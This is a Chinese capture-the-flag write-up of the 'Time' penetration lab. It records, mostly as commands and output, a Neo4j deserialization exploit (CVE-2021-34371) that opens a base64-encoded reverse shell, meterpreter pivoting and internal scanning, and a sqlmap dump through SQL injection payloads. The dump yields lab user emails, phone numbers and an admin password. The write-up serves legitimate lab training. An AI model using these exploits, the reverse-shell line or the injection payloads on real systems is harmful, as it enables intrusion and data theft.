Time - 春秋云境
靶标介绍:
Time 是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 flag,分布于不同的靶机。
| 内网地址 | Host or FQDN | 简要描述 |
|---|---|---|
| 172.22.6.36 | ubuntu | 外网 Neo4j 服务器 |
| 172.22.6.38 | 80 端口的后台登录界面,存在 SQL | |
| 172.22.6.25 | WIN2019.xiaorang.lab | 域内主机 |
| 172.22.6.12 | DC-PROGAME.xiaorang.lab | 域控制器 |
Neo4j Shell Server Deserialization
Kscan 端口扫描:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
_ __
/#| /#/
|#|/#/ _____ _____ * _ _
|#.#/ /Edge/ /Forum| /#\ |#\ |#\
|##| |#|____ |#| /kv2\ |##\|#|
|#.#\ \r0cky\|#| /#/_\#\ |#.#.#|
|#|\#\ /\___|#||#|____/#/###\#\|#|\##|
\#| \#\\lcvvvv/ \aels/#/ v1.85#\#| \#/
Tips: 可以使用--spy 192,将会对192.168.0.1/16(B段)进行网关存活性探测
[+]2023/01/01 17:11:39 当前环境为:windows, 输出编码为:utf-8
[+]2023/01/01 17:11:39 成功加载HTTP指纹:[24758]条
[+]2023/01/01 17:11:39 成功加载NMAP探针:[150]个,指纹[11916]条
[*]2023/01/01 17:11:39 未检测到qqwry.dat,将关闭CDN检测功能,如需开启,请执行kscan --download-qqwry下载该文件
[+]2023/01/01 17:11:40 Domain、IP、Port、URL、Hydra引擎已准备就绪
[+]2023/01/01 17:11:40 所有扫描任务已下发完毕
ssh://xx.xx.xx.xx:22 ssh Length:41,Info:UbuntuLinux;protocol2,Version:8.2p1Ubuntu4ubuntu0.5,Port:22,Digest:SSH-2.0-OpenSSH_8.2p1Ub,ProductName:OpenSSH,OperatingSystem:Linux
waste://xx.xx.xx.xx:1337 response is empty Port:1337,Length:0
[*]2023/01/01 17:12:00 当前存活协程数:Domain:0 个,IP:1 个,Port:68 个,URL:0 个,Hydra:0 个
http://xx.xx.xx.xx:7474 Digest:\"bolt\":\"bolt://47.9,Length:300,Port:7474
websocket://xx.xx.xx.xx:7687 websocket Port:7687,Digest:"HTTP/1.1400BadReques,Length:78,ProductName:Neo4jBoltprotocol
https://xx.xx.xx.xx:7473 Port:7473,Digest:b/manage/\",\n\"data\",Length:302
[+]2023/01/01 17:12:25 程序执行总时长为:[45.5836088s]
[+]2023/01/01 17:12:25 若有问题欢迎来我的Github提交Bug[https://github.com/lcvvvv/kscan/]
发现 Neo4j Web 管理界面(7474 端口)和 Neo4j Shell 端口(1337): 
利用 Neo4j Shell Server 反序列化漏洞(CVE-2021-34371) 反弹 shell:
1
2
3
4
5
6
7
8
9
.\jdk1.8.0_202\bin\java.exe -jar .\rhino_gadget.jar rmi://xx.xx.xx.xx:1337 "bash -c {echo,YzaCAiAvZGV2L...}|{base64,-d}|{bash,-i}"
Trying to enumerate server bindings:
Found binding: shell
[+] Found valid binding, proceeding to exploit
[+] Caught an unmarshalled exception, this is expected.
RemoteException occurred in server thread; nested exception is:
java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is:
java.io.IOException
[+] Exploit completed
获取 shell,查看 flag:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
neo4j@ubuntu:~$ cat flag01.txt
cat flag01.txt
██████████ ██
░░░░░██░░░ ░░
░██ ██ ██████████ █████
░██ ░██░░██░░██░░██ ██░░░██
░██ ░██ ░██ ░██ ░██░███████
░██ ░██ ░██ ░██ ░██░██░░░░
░██ ░██ ███ ░██ ░██░░██████
░░ ░░ ░░░ ░░ ░░ ░░░░░░
flag01: flag{dea03a84-275e-4f7b-b746-87f003da5f25}
Do you know the authentication process of Kerberos?
......This will be the key to your progress.
这个主机提权没成功,后续操作会稍微麻烦点。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
meterpreter > ifconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : eth0
Hardware MAC : 00:16:3e:02:56:ff
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 172.22.6.36
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::216:3eff:fe02:56ff
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > execute -i -H -f /home/neo4j/fscan_amd64 -a "-h 172.22.6.36/24 -hn 172.22.6.36 -pa 3389 -time 10 -nobr"
Process 19610 created.
Channel 7 created.
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.6.12 is alive
(icmp) Target 172.22.6.25 is alive
(icmp) Target 172.22.6.38 is alive
[*] Icmp alive hosts len is: 3
172.22.6.25:445 open
172.22.6.12:445 open
172.22.6.25:139 open
172.22.6.12:139 open
172.22.6.25:135 open
172.22.6.12:135 open
172.22.6.38:80 open
172.22.6.38:22 open
172.22.6.12:88 open
172.22.6.12:3389 open
172.22.6.25:3389 open
[*] alive ports len is: 11
start vulscan
[*] NetInfo:
[*]172.22.6.12
[->]DC-PROGAME
[->]172.22.6.12
[*] NetInfo:
[*]172.22.6.25
[->]WIN2019
[->]172.22.6.25
[*] NetBios: 172.22.6.25 XIAORANG\WIN2019
[*] WebTitle: http://172.22.6.38 code:200 len:1531 title:后台登录
[*] NetBios: 172.22.6.12 [+]DC DC-PROGAME.xiaorang.lab Windows Server 2016 Datacenter 14393
已完成 11/11
[*] 扫描结束,耗时: 9.956606485s
Kerberos Domain User Enumeration
http://172.22.6.38 后台登录界面存在 SQL 注入: 
HTTP 请求包:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /index.php HTTP/1.1
Host: 172.22.6.38
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: http://172.22.6.38
Connection: keep-alive
Referer: http://172.22.6.38/index.php
Upgrade-Insecure-Requests: 1
username=admin&password=admin123
使用 sqlmap 获取所有的数据,获取到域用户信息以及 flag:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
PS C:\sqlmap> proxychains4 -q python3 .\sqlmap.py -r .\rawhttp.txt --dump
___
__H__
___ ___[']_____ ___ ___ {1.6.12.11#dev}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:18:55 /2023-05-18/
[11:18:55] [INFO] parsing HTTP request from '.\rawhttp.txt'
[11:18:56] [INFO] resuming back-end DBMS 'mysql'
[11:18:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 8708 FROM (SELECT(SLEEP(5)))DqiW) AND 'VXIx'='VXIx&password=admin123
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: username=admin' UNION ALL SELECT NULL,CONCAT(0x716b626b71,0x7a5465717643516c49676a724947674a526a77756c765161674a797677536d424c42536445464354,0x717a716b71),NULL-- -&password=admin123
---
[11:19:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[11:19:01] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[11:19:01] [INFO] fetching current database
[11:19:01] [INFO] fetching tables for database: 'oa_db'
[11:19:01] [INFO] fetching columns for table 'oa_users' in database 'oa_db'
[11:19:01] [INFO] fetching entries for table 'oa_users' in database 'oa_db'
Database: oa_db
Table: oa_users
[500 entries]
+-----+----------------------------+-------------+-----------------+
| id | email | phone | username |
+-----+----------------------------+-------------+-----------------+
[11:19:02] [WARNING] console output will be trimmed to last 256 rows due to large table size
| 245 | chenyan@xiaorang.lab | 18281528743 | CHEN YAN |
| 246 | tanggui@xiaorang.lab | 18060615547 | TANG GUI |
| 247 | buning@xiaorang.lab | 13046481392 | BU NING |
| 248 | beishu@xiaorang.lab | 18268508400 | BEI SHU |
| 249 | shushi@xiaorang.lab | 17770383196 | SHU SHI |
| 250 | fuyi@xiaorang.lab | 18902082658 | FU YI |
| 251 | pangcheng@xiaorang.lab | 18823789530 | PANG CHENG |
| 252 | tonghao@xiaorang.lab | 13370873526 | TONG HAO |
| 253 | jiaoshan@xiaorang.lab | 15375905173 | JIAO SHAN |
| 254 | dulun@xiaorang.lab | 13352331157 | DU LUN |
| 255 | kejuan@xiaorang.lab | 13222550481 | KE JUAN |
| 256 | gexin@xiaorang.lab | 18181553086 | GE XIN |
| 257 | lugu@xiaorang.lab | 18793883130 | LU GU |
| 258 | guzaicheng@xiaorang.lab | 15309377043 | GU ZAI CHENG |
| 259 | feicai@xiaorang.lab | 13077435367 | FEI CAI |
| 260 | ranqun@xiaorang.lab | 18239164662 | RAN QUN |
| 261 | zhouyi@xiaorang.lab | 13169264671 | ZHOU YI |
| 262 | shishu@xiaorang.lab | 18592890189 | SHI SHU |
| 263 | yanyun@xiaorang.lab | 15071085768 | YAN YUN |
| 264 | chengqiu@xiaorang.lab | 13370162980 | CHENG QIU |
| 265 | louyou@xiaorang.lab | 13593582379 | LOU YOU |
| 266 | maqun@xiaorang.lab | 15235945624 | MA QUN |
| 267 | wenbiao@xiaorang.lab | 13620643639 | WEN BIAO |
| 268 | weishengshan@xiaorang.lab | 18670502260 | WEI SHENG SHAN |
| 269 | zhangxin@xiaorang.lab | 15763185760 | ZHANG XIN |
| 270 | chuyuan@xiaorang.lab | 18420545268 | CHU YUAN |
| 271 | wenliang@xiaorang.lab | 13601678032 | WEN LIANG |
| 272 | yulvxue@xiaorang.lab | 18304374901 | YU LV XUE |
| 273 | luyue@xiaorang.lab | 18299785575 | LU YUE |
| 274 | ganjian@xiaorang.lab | 18906111021 | GAN JIAN |
| 275 | pangzhen@xiaorang.lab | 13479328562 | PANG ZHEN |
| 276 | guohong@xiaorang.lab | 18510220597 | GUO HONG |
| 277 | lezhong@xiaorang.lab | 15320909285 | LE ZHONG |
| 278 | sheweiyue@xiaorang.lab | 13736399596 | SHE WEI YUE |
| 279 | dujian@xiaorang.lab | 15058892639 | DU JIAN |
| 280 | lidongjin@xiaorang.lab | 18447207007 | LI DONG JIN |
| 281 | hongqun@xiaorang.lab | 15858462251 | HONG QUN |
| 282 | yexing@xiaorang.lab | 13719043564 | YE XING |
| 283 | maoda@xiaorang.lab | 13878840690 | MAO DA |
| 284 | qiaomei@xiaorang.lab | 13053207462 | QIAO MEI |
| 285 | nongzhen@xiaorang.lab | 15227699960 | NONG ZHEN |
| 286 | dongshu@xiaorang.lab | 15695562947 | DONG SHU |
| 287 | zhuzhu@xiaorang.lab | 13070163385 | ZHU ZHU |
| 288 | jiyun@xiaorang.lab | 13987332999 | JI YUN |
| 289 | qiguanrou@xiaorang.lab | 15605983582 | QI GUAN ROU |
| 290 | yixue@xiaorang.lab | 18451603140 | YI XUE |
| 291 | chujun@xiaorang.lab | 15854942459 | CHU JUN |
| 292 | shenshan@xiaorang.lab | 17712052191 | SHEN SHAN |
| 293 | lefen@xiaorang.lab | 13271196544 | LE FEN |
| 294 | yubo@xiaorang.lab | 13462202742 | YU BO |
| 295 | helianrui@xiaorang.lab | 15383000907 | HE LIAN RUI |
| 296 | xuanqun@xiaorang.lab | 18843916267 | XUAN QUN |
| 297 | shangjun@xiaorang.lab | 15162486698 | SHANG JUN |
| 298 | huguang@xiaorang.lab | 18100586324 | HU GUANG |
| 299 | wansifu@xiaorang.lab | 18494761349 | WAN SI FU |
| 300 | fenghong@xiaorang.lab | 13536727314 | FENG HONG |
| 301 | wanyan@xiaorang.lab | 17890844429 | WAN YAN |
| 302 | diyan@xiaorang.lab | 18534028047 | DI YAN |
| 303 | xiangyu@xiaorang.lab | 13834043047 | XIANG YU |
| 304 | songyan@xiaorang.lab | 15282433280 | SONG YAN |
| 305 | fandi@xiaorang.lab | 15846960039 | FAN DI |
| 306 | xiangjuan@xiaorang.lab | 18120327434 | XIANG JUAN |
| 307 | beirui@xiaorang.lab | 18908661803 | BEI RUI |
| 308 | didi@xiaorang.lab | 13413041463 | DI DI |
| 309 | zhubin@xiaorang.lab | 15909558554 | ZHU BIN |
| 310 | lingchun@xiaorang.lab | 13022790678 | LING CHUN |
| 311 | zhenglu@xiaorang.lab | 13248244873 | ZHENG LU |
| 312 | xundi@xiaorang.lab | 18358493414 | XUN DI |
| 313 | wansishun@xiaorang.lab | 18985028319 | WAN SI SHUN |
| 314 | yezongyue@xiaorang.lab | 13866302416 | YE ZONG YUE |
| 315 | bianmei@xiaorang.lab | 18540879992 | BIAN MEI |
| 316 | shanshao@xiaorang.lab | 18791488918 | SHAN SHAO |
| 317 | zhenhui@xiaorang.lab | 13736784817 | ZHEN HUI |
| 318 | chengli@xiaorang.lab | 15913267394 | CHENG LI |
| 319 | yufen@xiaorang.lab | 18432795588 | YU FEN |
| 320 | jiyi@xiaorang.lab | 13574211454 | JI YI |
| 321 | panbao@xiaorang.lab | 13675851303 | PAN BAO |
| 322 | mennane@xiaorang.lab | 15629706208 | MEN NAN E |
| 323 | fengsi@xiaorang.lab | 13333432577 | FENG SI |
| 324 | mingyan@xiaorang.lab | 18296909463 | MING YAN |
| 325 | luoyou@xiaorang.lab | 15759321415 | LUO YOU |
| 326 | liangduanqing@xiaorang.lab | 13150744785 | LIANG DUAN QING |
| 327 | nongyan@xiaorang.lab | 18097386975 | NONG YAN |
| 328 | haolun@xiaorang.lab | 15152700465 | HAO LUN |
| 329 | oulun@xiaorang.lab | 13402760696 | OU LUN |
| 330 | weichipeng@xiaorang.lab | 18057058937 | WEI CHI PENG |
| 331 | qidiaofang@xiaorang.lab | 18728297829 | QI DIAO FANG |
| 332 | xuehe@xiaorang.lab | 13398862169 | XUE HE |
| 333 | chensi@xiaorang.lab | 18030178713 | CHEN SI |
| 334 | guihui@xiaorang.lab | 17882514129 | GUI HUI |
| 335 | fuyue@xiaorang.lab | 18298436549 | FU YUE |
| 336 | wangxing@xiaorang.lab | 17763645267 | WANG XING |
| 337 | zhengxiao@xiaorang.lab | 18673968392 | ZHENG XIAO |
| 338 | guhui@xiaorang.lab | 15166711352 | GU HUI |
| 339 | baoai@xiaorang.lab | 15837430827 | BAO AI |
| 340 | hangzhao@xiaorang.lab | 13235488232 | HANG ZHAO |
| 341 | xingye@xiaorang.lab | 13367587521 | XING YE |
| 342 | qianyi@xiaorang.lab | 18657807767 | QIAN YI |
| 343 | xionghong@xiaorang.lab | 17725874584 | XIONG HONG |
| 344 | zouqi@xiaorang.lab | 15300430128 | ZOU QI |
| 345 | rongbiao@xiaorang.lab | 13034242682 | RONG BIAO |
| 346 | gongxin@xiaorang.lab | 15595839880 | GONG XIN |
| 347 | luxing@xiaorang.lab | 18318675030 | LU XING |
| 348 | huayan@xiaorang.lab | 13011805354 | HUA YAN |
| 349 | duyue@xiaorang.lab | 15515878208 | DU YUE |
| 350 | xijun@xiaorang.lab | 17871583183 | XI JUN |
| 351 | daiqing@xiaorang.lab | 18033226216 | DAI QING |
| 352 | yingbiao@xiaorang.lab | 18633421863 | YING BIAO |
| 353 | hengteng@xiaorang.lab | 15956780740 | HENG TENG |
| 354 | changwu@xiaorang.lab | 15251485251 | CHANG WU |
| 355 | chengying@xiaorang.lab | 18788248715 | CHENG YING |
| 356 | luhong@xiaorang.lab | 17766091079 | LU HONG |
| 357 | tongxue@xiaorang.lab | 18466102780 | TONG XUE |
| 358 | xiangqian@xiaorang.lab | 13279611385 | XIANG QIAN |
| 359 | shaokang@xiaorang.lab | 18042645434 | SHAO KANG |
| 360 | nongzhu@xiaorang.lab | 13934236634 | NONG ZHU |
| 361 | haomei@xiaorang.lab | 13406913218 | HAO MEI |
| 362 | maoqing@xiaorang.lab | 15713298425 | MAO QING |
| 363 | xiai@xiaorang.lab | 18148404789 | XI AI |
| 364 | bihe@xiaorang.lab | 13628593791 | BI HE |
| 365 | gaoli@xiaorang.lab | 15814408188 | GAO LI |
| 366 | jianggong@xiaorang.lab | 15951118926 | JIANG GONG |
| 367 | pangning@xiaorang.lab | 13443921700 | PANG NING |
| 368 | ruishi@xiaorang.lab | 15803112819 | RUI SHI |
| 369 | wuhuan@xiaorang.lab | 13646953078 | WU HUAN |
| 370 | qiaode@xiaorang.lab | 13543564200 | QIAO DE |
| 371 | mayong@xiaorang.lab | 15622971484 | MA YONG |
| 372 | hangda@xiaorang.lab | 15937701659 | HANG DA |
| 373 | changlu@xiaorang.lab | 13734991654 | CHANG LU |
| 374 | liuyuan@xiaorang.lab | 15862054540 | LIU YUAN |
| 375 | chenggu@xiaorang.lab | 15706685526 | CHENG GU |
| 376 | shentuyun@xiaorang.lab | 15816902379 | SHEN TU YUN |
| 377 | zhuangsong@xiaorang.lab | 17810274262 | ZHUANG SONG |
| 378 | chushao@xiaorang.lab | 18822001640 | CHU SHAO |
| 379 | heli@xiaorang.lab | 13701347081 | HE LI |
| 380 | haoming@xiaorang.lab | 15049615282 | HAO MING |
| 381 | xieyi@xiaorang.lab | 17840660107 | XIE YI |
| 382 | shangjie@xiaorang.lab | 15025010410 | SHANG JIE |
| 383 | situxin@xiaorang.lab | 18999728941 | SI TU XIN |
| 384 | linxi@xiaorang.lab | 18052976097 | LIN XI |
| 385 | zoufu@xiaorang.lab | 15264535633 | ZOU FU |
| 386 | qianqing@xiaorang.lab | 18668594658 | QIAN QING |
| 387 | qiai@xiaorang.lab | 18154690198 | QI AI |
| 388 | ruilin@xiaorang.lab | 13654483014 | RUI LIN |
| 389 | luomeng@xiaorang.lab | 15867095032 | LUO MENG |
| 390 | huaren@xiaorang.lab | 13307653720 | HUA REN |
| 391 | yanyangmei@xiaorang.lab | 15514015453 | YAN YANG MEI |
| 392 | zuofen@xiaorang.lab | 15937087078 | ZUO FEN |
| 393 | manyuan@xiaorang.lab | 18316106061 | MAN YUAN |
| 394 | yuhui@xiaorang.lab | 18058257228 | YU HUI |
| 395 | sunli@xiaorang.lab | 18233801124 | SUN LI |
| 396 | guansixin@xiaorang.lab | 13607387740 | GUAN SI XIN |
| 397 | ruisong@xiaorang.lab | 13306021674 | RUI SONG |
| 398 | qiruo@xiaorang.lab | 13257810331 | QI RUO |
| 399 | jinyu@xiaorang.lab | 18565922652 | JIN YU |
| 400 | shoujuan@xiaorang.lab | 18512174415 | SHOU JUAN |
| 401 | yanqian@xiaorang.lab | 13799789435 | YAN QIAN |
| 402 | changyun@xiaorang.lab | 18925015029 | CHANG YUN |
| 403 | hualu@xiaorang.lab | 13641470801 | HUA LU |
| 404 | huanming@xiaorang.lab | 15903282860 | HUAN MING |
| 405 | baoshao@xiaorang.lab | 13795275611 | BAO SHAO |
| 406 | hongmei@xiaorang.lab | 13243605925 | HONG MEI |
| 407 | manyun@xiaorang.lab | 13238107359 | MAN YUN |
| 408 | changwan@xiaorang.lab | 13642205622 | CHANG WAN |
| 409 | wangyan@xiaorang.lab | 13242486231 | WANG YAN |
| 410 | shijian@xiaorang.lab | 15515077573 | SHI JIAN |
| 411 | ruibei@xiaorang.lab | 18157706586 | RUI BEI |
| 412 | jingshao@xiaorang.lab | 18858376544 | JING SHAO |
| 413 | jinzhi@xiaorang.lab | 18902437082 | JIN ZHI |
| 414 | yuhui@xiaorang.lab | 15215599294 | YU HUI |
| 415 | zangpeng@xiaorang.lab | 18567574150 | ZANG PENG |
| 416 | changyun@xiaorang.lab | 15804640736 | CHANG YUN |
| 417 | yetai@xiaorang.lab | 13400150018 | YE TAI |
| 418 | luoxue@xiaorang.lab | 18962643265 | LUO XUE |
| 419 | moqian@xiaorang.lab | 18042706956 | MO QIAN |
| 420 | xupeng@xiaorang.lab | 15881934759 | XU PENG |
| 421 | ruanyong@xiaorang.lab | 15049703903 | RUAN YONG |
| 422 | guliangxian@xiaorang.lab | 18674282714 | GU LIANG XIAN |
| 423 | yinbin@xiaorang.lab | 15734030492 | YIN BIN |
| 424 | huarui@xiaorang.lab | 17699257041 | HUA RUI |
| 425 | niuya@xiaorang.lab | 13915041589 | NIU YA |
| 426 | guwei@xiaorang.lab | 13584571917 | GU WEI |
| 427 | qinguan@xiaorang.lab | 18427953434 | QIN GUAN |
| 428 | yangdanhan@xiaorang.lab | 15215900100 | YANG DAN HAN |
| 429 | yingjun@xiaorang.lab | 13383367818 | YING JUN |
| 430 | weiwan@xiaorang.lab | 13132069353 | WEI WAN |
| 431 | sunduangu@xiaorang.lab | 15737981701 | SUN DUAN GU |
| 432 | sisiwu@xiaorang.lab | 18021600640 | SI SI WU |
| 433 | nongyan@xiaorang.lab | 13312613990 | NONG YAN |
| 434 | xuanlu@xiaorang.lab | 13005748230 | XUAN LU |
| 435 | yunzhong@xiaorang.lab | 15326746780 | YUN ZHONG |
| 436 | gengfei@xiaorang.lab | 13905027813 | GENG FEI |
| 437 | zizhuansong@xiaorang.lab | 13159301262 | ZI ZHUAN SONG |
| 438 | ganbailong@xiaorang.lab | 18353612904 | GAN BAI LONG |
| 439 | shenjiao@xiaorang.lab | 15164719751 | SHEN JIAO |
| 440 | zangyao@xiaorang.lab | 18707028470 | ZANG YAO |
| 441 | yangdanhe@xiaorang.lab | 18684281105 | YANG DAN HE |
| 442 | chengliang@xiaorang.lab | 13314617161 | CHENG LIANG |
| 443 | xudi@xiaorang.lab | 18498838233 | XU DI |
| 444 | wulun@xiaorang.lab | 18350490780 | WU LUN |
| 445 | yuling@xiaorang.lab | 18835870616 | YU LING |
| 446 | taoya@xiaorang.lab | 18494928860 | TAO YA |
| 447 | jinle@xiaorang.lab | 15329208123 | JIN LE |
| 448 | youchao@xiaorang.lab | 13332964189 | YOU CHAO |
| 449 | liangduanzhi@xiaorang.lab | 15675237494 | LIANG DUAN ZHI |
| 450 | jiagupiao@xiaorang.lab | 17884962455 | JIA GU PIAO |
| 451 | ganze@xiaorang.lab | 17753508925 | GAN ZE |
| 452 | jiangqing@xiaorang.lab | 15802357200 | JIANG QING |
| 453 | jinshan@xiaorang.lab | 13831466303 | JIN SHAN |
| 454 | zhengpubei@xiaorang.lab | 13690156563 | ZHENG PU BEI |
| 455 | cuicheng@xiaorang.lab | 17641589842 | CUI CHENG |
| 456 | qiyong@xiaorang.lab | 13485427829 | QI YONG |
| 457 | qizhu@xiaorang.lab | 18838859844 | QI ZHU |
| 458 | ganjian@xiaorang.lab | 18092585003 | GAN JIAN |
| 459 | yurui@xiaorang.lab | 15764121637 | YU RUI |
| 460 | feishu@xiaorang.lab | 18471512248 | FEI SHU |
| 461 | chenxin@xiaorang.lab | 13906545512 | CHEN XIN |
| 462 | shengzhe@xiaorang.lab | 18936457394 | SHENG ZHE |
| 463 | wohong@xiaorang.lab | 18404022650 | WO HONG |
| 464 | manzhi@xiaorang.lab | 15973350408 | MAN ZHI |
| 465 | xiangdong@xiaorang.lab | 13233908989 | XIANG DONG |
| 466 | weihui@xiaorang.lab | 15035834945 | WEI HUI |
| 467 | xingquan@xiaorang.lab | 18304752969 | XING QUAN |
| 468 | miaoshu@xiaorang.lab | 15121570939 | MIAO SHU |
| 469 | gongwan@xiaorang.lab | 18233990398 | GONG WAN |
| 470 | qijie@xiaorang.lab | 15631483536 | QI JIE |
| 471 | shaoting@xiaorang.lab | 15971628914 | SHAO TING |
| 472 | xiqi@xiaorang.lab | 18938747522 | XI QI |
| 473 | jinghong@xiaorang.lab | 18168293686 | JING HONG |
| 474 | qianyou@xiaorang.lab | 18841322688 | QIAN YOU |
| 475 | chuhua@xiaorang.lab | 15819380754 | CHU HUA |
| 476 | yanyue@xiaorang.lab | 18702474361 | YAN YUE |
| 477 | huangjia@xiaorang.lab | 13006878166 | HUANG JIA |
| 478 | zhouchun@xiaorang.lab | 13545820679 | ZHOU CHUN |
| 479 | jiyu@xiaorang.lab | 18650881187 | JI YU |
| 480 | wendong@xiaorang.lab | 17815264093 | WEN DONG |
| 481 | heyuan@xiaorang.lab | 18710821773 | HE YUAN |
| 482 | mazhen@xiaorang.lab | 18698248638 | MA ZHEN |
| 483 | shouchun@xiaorang.lab | 15241369178 | SHOU CHUN |
| 484 | liuzhe@xiaorang.lab | 18530936084 | LIU ZHE |
| 485 | fengbo@xiaorang.lab | 15812110254 | FENG BO |
| 486 | taigongyuan@xiaorang.lab | 15943349034 | TAI GONG YUAN |
| 487 | gesheng@xiaorang.lab | 18278508909 | GE SHENG |
| 488 | songming@xiaorang.lab | 13220512663 | SONG MING |
| 489 | yuwan@xiaorang.lab | 15505678035 | YU WAN |
| 490 | diaowei@xiaorang.lab | 13052582975 | DIAO WEI |
| 491 | youyi@xiaorang.lab | 18036808394 | YOU YI |
| 492 | rongxianyu@xiaorang.lab | 18839918955 | RONG XIAN YU |
| 493 | fuyi@xiaorang.lab | 15632151678 | FU YI |
| 494 | linli@xiaorang.lab | 17883399275 | LIN LI |
| 495 | weixue@xiaorang.lab | 18672465853 | WEI XUE |
| 496 | hejuan@xiaorang.lab | 13256081102 | HE JUAN |
| 497 | zuoqiutai@xiaorang.lab | 18093001354 | ZUO QIU TAI |
| 498 | siyi@xiaorang.lab | 17873307773 | SI YI |
| 499 | shenshan@xiaorang.lab | 18397560369 | SHEN SHAN |
| 500 | tongdong@xiaorang.lab | 15177549595 | TONG DONG |
+-----+----------------------------+-------------+-----------------+
[11:19:02] [INFO] table 'oa_db.oa_users' dumped to CSV file 'C:\Users\test\AppData\Local\sqlmap\output\172.22.6.38\dump\oa_db\oa_users.csv'
[11:19:02] [INFO] fetching columns for table 'oa_f1Agggg' in database 'oa_db'
[11:19:02] [INFO] fetching entries for table 'oa_f1Agggg' in database 'oa_db'
Database: oa_db
Table: oa_f1Agggg
[1 entry]
+----+--------------------------------------------+
| id | flag02 |
+----+--------------------------------------------+
| 1 | flag{b142f5ce-d9b8-4b73-9012-ad75175ba029} |
+----+--------------------------------------------+
[11:19:02] [INFO] table 'oa_db.oa_f1Agggg' dumped to CSV file 'C:\Users\test\AppData\Local\sqlmap\output\172.22.6.38\dump\oa_db\oa_f1Agggg.csv'
[11:19:02] [INFO] fetching columns for table 'oa_admin' in database 'oa_db'
[11:19:02] [INFO] fetching entries for table 'oa_admin' in database 'oa_db'
Database: oa_db
Table: oa_admin
[1 entry]
+----+------------------+---------------+
| id | password | username |
+----+------------------+---------------+
| 1 | bo2y8kAL3HnXUiQo | administrator |
+----+------------------+---------------+
[11:19:02] [INFO] table 'oa_db.oa_admin' dumped to CSV file 'C:\Users\test\AppData\Local\sqlmap\output\172.22.6.38\dump\oa_db\oa_admin.csv'
[11:19:02] [INFO] fetched data logged to text files under 'C:\Users\test\AppData\Local\sqlmap\output\172.22.6.38'
[*] ending @ 11:19:02 /2023-05-18/
使用 kerbrute 工具进行域用户名枚举:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
